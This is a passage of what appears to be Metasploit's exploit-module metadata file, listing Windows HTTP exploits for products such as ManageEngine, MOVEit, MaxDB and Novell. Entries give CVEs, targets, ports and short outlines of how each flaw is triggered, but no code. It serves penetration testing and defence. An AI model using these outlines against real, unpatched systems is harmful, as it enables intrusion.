"ref_name": "windows/http/manageengine_apps_mngr", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_connectionid_write": { - "name": "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability", - "fullname": "exploit/windows/http/manageengine_connectionid_write", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-12-14", - "type": "exploit", - "author": [ - "sinn3r " - ], - "description": "This module exploits a vulnerability found in ManageEngine Desktop Central 9. When\n uploading a 7z file, the FileUploadServlet class does not check the user-controlled\n ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to\n inject a null bye at the end of the value to create a malicious file with an arbitrary\n file type, and then place it under a directory that allows server-side scripts to run,\n which results in remote code execution under the context of SYSTEM.\n\n Please note that by default, some ManageEngine Desktop Central versions run on port 8020,\n but older ones run on port 8040. 
Also, using this exploit will leave debugging information\n produced by FileUploadServlet in file rdslog0.txt.\n\n This exploit was successfully tested on version 9, build 90109 and build 91084.", - "references": [ - "URL-https://www.rapid7.com/blog/post/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249", - "CVE-2015-8249" - ], - "platform": "Windows", - "arch": "", - "rport": 8020, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "ManageEngine Desktop Central 9 on Windows" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/http/manageengine_connectionid_write.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_connectionid_write", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966": { - "name": "ManageEngine Endpoint Central Unauthenticated SAML RCE", - "fullname": "exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-01-10", - "type": "exploit", - "author": [ - "Khoa Dinh", - "horizon3ai", - "Christophe De La Fuente", - "h00die-gr3y " - ], - "description": "This exploits an unauthenticated remote code execution vulnerability\n that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10\n and below (CVE-2022-47966). Due to a dependency to an outdated library\n (Apache Santuario version 1.4.1), it is possible to execute arbitrary\n code by providing a crafted `samlResponse` XML to the Endpoint Central\n SAML endpoint. 
Note that the target is only vulnerable if it is\n configured with SAML-based SSO , and the service should be active.", - "references": [ - "CVE-2022-47966", - "URL-https://blog.viettelcybersecurity.com/saml-show-stopper/", - "URL-https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/", - "URL-https://github.com/horizon3ai/CVE-2022-47966", - "URL-https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis" - ], - "platform": "Java,Windows", - "arch": "", - "rport": 8020, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Java (in-memory)", - "Windows EXE Dropper", - "Windows Command" - ], - "mod_time": "2024-06-14 12:05:12 +0000", - "path": "/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_servicedesk_plus_cve_2021_44077": { - "name": "ManageEngine ServiceDesk Plus CVE-2021-44077", - "fullname": "exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-09-16", - "type": "exploit", - "author": [ - "wvu ", - "Y4er" - ], - "description": "This module exploits CVE-2021-44077, an unauthenticated remote code\n execution vulnerability in ManageEngine ServiceDesk Plus, to upload an\n EXE (msiexec.exe) and execute it as the SYSTEM account.\n\n Note that build 11305 is vulnerable to the authentication bypass but\n not the file upload. 
The module will check for an exploitable build.", - "references": [ - "CVE-2021-44077", - "URL-https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", - "URL-https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", - "URL-https://www.cisa.gov/uscert/ncas/alerts/aa21-336a", - "URL-https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/", - "URL-https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis", - "URL-https://xz.aliyun.com/t/10631" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Dropper" - ], - "mod_time": "2021-12-09 17:27:35 +0000", - "path": "/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_servicedesk_plus_cve_2021_44077", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/maxdb_webdbm_database": { - "name": "MaxDB WebDBM Database Parameter Overflow", - "fullname": "exploit/windows/http/maxdb_webdbm_database", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-08-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the MaxDB WebDBM\n service. By sending a specially-crafted HTTP request that contains\n an overly long database name. 
A remote attacker could overflow a buffer\n and execute arbitrary code on the system with privileges of the wahttp process.\n\n This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.", - "references": [ - "CVE-2006-4305", - "OSVDB-28300", - "BID-19660" - ], - "platform": "Windows", - "arch": "", - "rport": 9999, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MaxDB 7.6.00.16", - "MaxDB 7.6.00.27" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/maxdb_webdbm_database.rb", - "is_install_path": true, - "ref_name": "windows/http/maxdb_webdbm_database", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/maxdb_webdbm_get_overflow": { - "name": "MaxDB WebDBM GET Buffer Overflow", - "fullname": "exploit/windows/http/maxdb_webdbm_get_overflow", - "aliases": [], - "rank": 400, - "disclosure_date": "2005-04-26", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the MaxDB WebDBM\n service. This service is included with many recent versions\n of the MaxDB and SAPDB products. This particular module is\n capable of exploiting Windows systems through the use of an\n SEH frame overwrite. 
The offset to the SEH frame may change\n depending on where MaxDB has been installed, this module\n assumes a web root path with the same length as:\n\n C:\\Program Files\\sdb\\programs\\web\\Documents", - "references": [ - "CVE-2005-0684", - "OSVDB-15816", - "URL-http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities", - "BID-13368" - ], - "platform": "Windows", - "arch": "", - "rport": 9999, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "MaxDB 7.5.00.11 / 7.5.00.24", - "Windows 2000 English", - "Windows XP English SP0/SP1", - "Windows 2003 English", - "Windows NT 4.0 SP4/SP5/SP6" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/maxdb_webdbm_get_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/mcafee_epolicy_source": { - "name": "McAfee ePolicy Orchestrator / ProtectionPilot Overflow", - "fullname": "exploit/windows/http/mcafee_epolicy_source", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-07-17", - "type": "exploit", - "author": [ - "muts ", - "xbxice ", - "hdm ", - "aushack " - ], - "description": "This is an exploit for the McAfee HTTP Server (NAISERV.exe).\n McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are\n known to be vulnerable. By sending a large 'Source' header, the stack can\n be overwritten. 
This module is based on the exploit by xbxice and muts.\n Due to size constraints, this module uses the Egghunter technique.", - "references": [ - "CVE-2006-5156", - "OSVDB-29421", - "EDB-2467", - "BID-20288" - ], - "platform": "Windows", - "arch": "x86", - "rport": 81, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "ePo 2.5.1 (Service Pack 1)", - "ePo 3.5.0/ProtectionPilot 1.1.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/mcafee_epolicy_source.rb", - "is_install_path": true, - "ref_name": "windows/http/mcafee_epolicy_source", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/mdaemon_worldclient_form2raw": { - "name": "MDaemon WorldClient form2raw.cgi Stack Buffer Overflow", - "fullname": "exploit/windows/http/mdaemon_worldclient_form2raw", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-12-29", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for\n versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),\n a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,\n by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),\n the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based\n overflow occurs when an excessively long From field is specified.\n The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.\n Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.\n\n Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very\n reliable). 
Once the payload is written into the Raw Queue by Form2Raw, MDaemon will\n continue to crash/execute the payload until the CGI output is manually deleted\n from the queue in C:\\MDaemon\\RawFiles\\*.raw.", - "references": [ - "CVE-2003-1200", - "OSVDB-3255", - "BID-9317" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal MDaemon.exe", - "Debugging test" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb", - "is_install_path": true, - "ref_name": "windows/http/mdaemon_worldclient_form2raw", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/minishare_get_overflow": { - "name": "Minishare 1.4.1 Buffer Overflow", - "fullname": "exploit/windows/http/minishare_get_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-11-07", - "type": "exploit", - "author": [ - "acaro " - ], - "description": "This is a simple buffer overflow for the minishare web\n server. This flaw affects all versions prior to 1.4.2. This\n is a plain stack buffer overflow that requires a \"jmp esp\" to reach\n the payload, making this difficult to target many platforms\n at once. This module has been successfully tested against\n 1.4.1. 
Version 1.3.4 and below do not seem to be vulnerable.", - "references": [ - "CVE-2004-2271", - "OSVDB-11530", - "BID-11620", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Windows 2000 SP0-SP3 English", - "Windows 2000 SP4 English", - "Windows XP SP0-SP1 English", - "Windows XP SP2 English", - "Windows 2003 SP0 English", - "Windows 2003 SP1 English", - "Windows 2003 SP2 English", - "Windows NT 4.0 SP6", - "Windows XP SP2 German", - "Windows XP SP2 Polish", - "Windows XP SP2 French", - "Windows XP SP3 French" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/minishare_get_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/minishare_get_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/miniweb_upload_wbem": { - "name": "MiniWeb (Build 300) Arbitrary File Upload", - "fullname": "exploit/windows/http/miniweb_upload_wbem", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-04-09", - "type": "exploit", - "author": [ - "AkaStep", - "bcoles " - ], - "description": "This module exploits a vulnerability in MiniWeb HTTP server (build 300).\n The software contains a file upload vulnerability that allows an\n unauthenticated remote attacker to write arbitrary files to the file system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then upload another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.", - "references": [ - 
"OSVDB-92198", - "OSVDB-92200", - "PACKETSTORM-121168" - ], - "platform": "Windows", - "arch": "", - "rport": 8000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "MiniWeb build 300 on Windows (Before Vista)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/miniweb_upload_wbem.rb", - "is_install_path": true, - "ref_name": "windows/http/miniweb_upload_wbem", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/moveit_cve_2023_34362": { - "name": "MOVEit SQL Injection vulnerability", - "fullname": "exploit/windows/http/moveit_cve_2023_34362", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-05-31", - "type": "exploit", - "author": [ - "sfewer-r7", - "rbowes-r7", - "bwatters-r7" - ], - "description": "This module exploits an SQL injection vulnerability in the MOVEit Transfer web application\n that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.\n Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an\n attacker can leverage an information leak be able to upload a .NET deserialization payload.", - "references": [ - "CVE-2023-34362", - "URL-https://github.com/sfewer-r7/CVE-2023-34362", - "URL-https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis", - "URL-https://www.wiz.io/blog/cve-2023-34362" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command" - ], - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/exploits/windows/http/moveit_cve_2023_34362.rb", - "is_install_path": true, - "ref_name": 
"windows/http/moveit_cve_2023_34362", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/navicopa_get_overflow": { - "name": "NaviCOPA 2.0.1 URL Handling Buffer Overflow", - "fullname": "exploit/windows/http/navicopa_get_overflow", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-09-28", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in NaviCOPA 2.0.1.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.", - "references": [ - "CVE-2006-5112", - "OSVDB-29257", - "BID-20250" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "NaviCOPA 2.0.1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/navicopa_get_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/navicopa_get_overflow", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/netdecision_http_bof": { - "name": "NetDecision 4.5.1 HTTP Server Buffer Overflow", - "fullname": "exploit/windows/http/netdecision_http_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-02-24", - "type": "exploit", - "author": [ - "Prabhu S Angadi", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in NetDecision's HTTP service\n (located in C:\\Program Files\\NetDecision\\Bin\\HttpSvr.exe). By supplying a\n long string of data to the URL, an overflow may occur if the data gets handled\n by HTTP Server's active window. 
In other words, in order to gain remote code\n execution, the victim is probably looking at HttpSvr's window.", - "references": [ - "CVE-2012-1465", - "OSVDB-79651", - "URL-http://web.archive.org/web/20121024124508/http://secunia.com/advisories/48168/", - "URL-http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "NetDecision 4.5.1 on XP SP3" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/http/netdecision_http_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/netdecision_http_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/netgear_nms_rce": { - "name": "NETGEAR ProSafe Network Management System 300 Arbitrary File Upload", - "fullname": "exploit/windows/http/netgear_nms_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-02-04", - "type": "exploit", - "author": [ - "Ege BALCI ", - "Pedro Ribeiro " - ], - "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has multiple vulnerabilities that can allow an unauthenticated remote\n attacker to execute code as SYSTEM user. 
Vulnerabilities include authentication bypass,\n SQL injection, arbitrary file upload, and privilege escalation across various versions.\n This module is able to spawn a meterpreter session by chaining together two specific\n vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.\n This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.1.0.13, 1.7.0.12, and 1.7.0.1.", - "references": [ - "ZDI-23-920", - "ZDI-23-918", - "CVE-2023-38096", - "CVE-2023-38098", - "CVE-2016-1525", - "US-CERT-VU-777024", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt", - "URL-https://seclists.org/fulldisclosure/2016/Feb/30", - "URL-https://kb.netgear.com/000065707/Security-Advisory-for-Multiple-Vulnerabilities-on-the-ProSAFE-Network-Management-System-PSV-2023-0024-PSV-2023-0025" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "NETGEAR ProSafe Network Management System 300 / Windows" - ], - "mod_time": "2023-08-02 18:03:57 +0000", - "path": "/modules/exploits/windows/http/netgear_nms_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/netgear_nms_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/netmotion_mobility_mvcutil_deserialization": { - "name": "NetMotion Mobility Server MvcUtil Java Deserialization", - "fullname": "exploit/windows/http/netmotion_mobility_mvcutil_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-02-08", - "type": "exploit", - "author": [ - "mr_me", - "wvu " - ], - "description": "This module exploits an 
unauthenticated Java deserialization in the\n NetMotion Mobility server's MvcUtil.valueStringToObject() method, as\n invoked through the /mobility/Menu/isLoggedOn endpoint, to execute\n code as the SYSTEM account.\n\n Mobility server versions 11.x before 11.73 and 12.x before 12.02 are\n vulnerable. Tested against 12.01.09045 on Windows Server 2016.", - "references": [ - "CVE-2021-26914", - "URL-https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/", - "URL-https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020", - "URL-https://srcincite.io/advisories/src-2021-0007/" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2021-07-08 21:26:35 +0000", - "path": "/modules/exploits/windows/http/netmotion_mobility_mvcutil_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/http/netmotion_mobility_mvcutil_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/northstar_c2_xss_to_agent_rce": { - "name": "NorthStar C2 XSS to Agent RCE", - "fullname": "exploit/windows/http/northstar_c2_xss_to_agent_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-03-12", - "type": "exploit", - "author": [ - "h00die", - "chebuya" - ], - "description": "NorthStar C2, prior to commit 7674a44 on March 11 2024, contains a vulnerability where the logs page is\n vulnerable to a stored xss.\n An 
unauthenticated user can simulate an agent registration to cause the XSS and take over a users session.\n With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts\n (agents), and kill the original agent.\n\n Successfully tested against NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 running on\n Ubuntu 22.04. The agent was running on Windows 10 19045.", - "references": [ - "URL-https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/", - "URL-https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc", - "URL-https://github.com/EnginDemirbilek/NorthStarC2/commit/7674a4457fca83058a157c03aa7bccd02f4a213c", - "CVE-2024-28741" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2024-04-24 16:54:58 +0000", - "path": "/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/northstar_c2_xss_to_agent_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "event-dependent" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/novell_imanager_upload": { - "name": "Novell iManager getMultiPartParameters Arbitrary File Upload", - "fullname": "exploit/windows/http/novell_imanager_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-10-01", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a directory traversal vulnerability which\n allows remote attackers to upload and execute arbitrary code.\n\n PortalModuleInstallManager", - 
"references": [ - "OSVDB-68320", - "ZDI-10-190", - "URL-http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Universal Windows Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/novell_imanager_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/novell_imanager_upload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/novell_mdm_lfi": { - "name": "Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability", - "fullname": "exploit/windows/http/novell_mdm_lfi", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-03-13", - "type": "exploit", - "author": [ - "steponequit", - "Andrea Micalizzi (aka rgod)" - ], - "description": "This module exercises a vulnerability in Novel Zenworks Mobile Management's Mobile Device Management component\n which can allow unauthenticated remote code execution. 
Due to a flaw in the MDM.php script's input validation,\n remote attackers can both upload and execute code via a directory traversal flaw exposed in the 'language'\n parameter of a POST call to DUSAP.php.", - "references": [ - "CVE-2013-1081", - "OSVDB-91119", - "ZDI-13-087", - "URL-http://www.novell.com/support/kb/doc.php?id=7011895" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Novell Zenworks Mobile Device Management on Windows" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/http/novell_mdm_lfi.rb", - "is_install_path": true, - "ref_name": "windows/http/novell_mdm_lfi", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/novell_messenger_acceptlang": { - "name": "Novell Messenger Server 2.0 Accept-Language Overflow", - "fullname": "exploit/windows/http/novell_messenger_acceptlang", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-04-13", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in Novell GroupWise\n Messenger Server v2.0. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 16 bytes.\n To overwrite the return address on the stack, we must first\n pass a memcpy() operation that uses pointers we supply. 
Due to the\n large list of restricted characters and the limitations of the current\n encoder modules, very few payloads are usable.", - "references": [ - "CVE-2006-0992", - "OSVDB-24617", - "BID-17503" - ], - "platform": "Windows", - "arch": "", - "rport": 8300, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Groupwise Messenger DClient.dll v10510.37" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/novell_messenger_acceptlang.rb", - "is_install_path": true, - "ref_name": "windows/http/novell_messenger_acceptlang", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/nowsms": { - "name": "Now SMS/MMS Gateway Buffer Overflow", - "fullname": "exploit/windows/http/nowsms", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-02-19", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2008-0871", - "OSVDB-42953", - "BID-27896" - ], - "platform": "Windows", - "arch": "", - "rport": 8800, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Now SMS/MMS Gateway v2007.06.27" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/nowsms.rb", - "is_install_path": true, - "ref_name": "windows/http/nowsms", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/nscp_authenticated_rce": { - "name": "NSClient++ 0.5.2.35 - ExternalScripts Authenticated Remote Code Execution", - "fullname": 
"exploit/windows/http/nscp_authenticated_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-10-20", - "type": "exploit", - "author": [ - "kindredsec", - "Yann Castel (yann.castel " - ], - "description": "This module allows an attacker with knowledge of the admin password of NSClient++\n to start a privilege shell.\n For this module to work, both web interface of NSClient++ and `ExternalScripts` feature\n should be enabled.", - "references": [ - "EDB-48360" - ], - "platform": "Windows", - "arch": "x64", - "rport": 8443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/http/nscp_authenticated_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/nscp_authenticated_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/oats_weblogic_console": { - "name": "Oracle Application Testing Suite WebLogic Server Administration Console War Deployment", - "fullname": "exploit/windows/http/oats_weblogic_console", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-03-13", - "type": "exploit", - "author": [ - "Steven Seeley", - "sinn3r " - ], - "description": "This module abuses a feature in WebLogic Server's Administration Console to install\n a malicious Java application in order to gain remote code execution. 
